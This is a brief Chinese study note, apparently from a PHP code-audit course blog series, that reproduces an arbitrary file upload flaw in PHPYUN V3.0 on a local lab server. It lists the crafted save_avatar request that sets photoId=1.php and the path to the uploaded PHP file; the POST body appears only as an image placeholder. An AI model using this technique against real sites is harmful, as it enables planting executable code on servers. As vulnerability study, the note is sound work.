米安代码审计 06 PHPYUN V3.0 任意文件上传漏洞



本文记录 PHP 代码审计的学习过程,教程为暗月 2015 版的 PHP 代码审计课程

PHP 代码审计博客目录

1. 简介

web环境: phpstudy apache+php5.2

程序版本:phpyun3.0 2013-11-02

2. 测试

首先注册一个会员 然后访问

http://192.168.171.128/member/index.php?XDEBUG_SESSION_START=netbeans-xdebug&M=index&C=save_avatar&type=small&photoId=1.php

POST:

在这里插入图片描述

构造文件上传成功 我们访问下

http://192.168.171.128/upload/user/user_small/1.php

在这里插入图片描述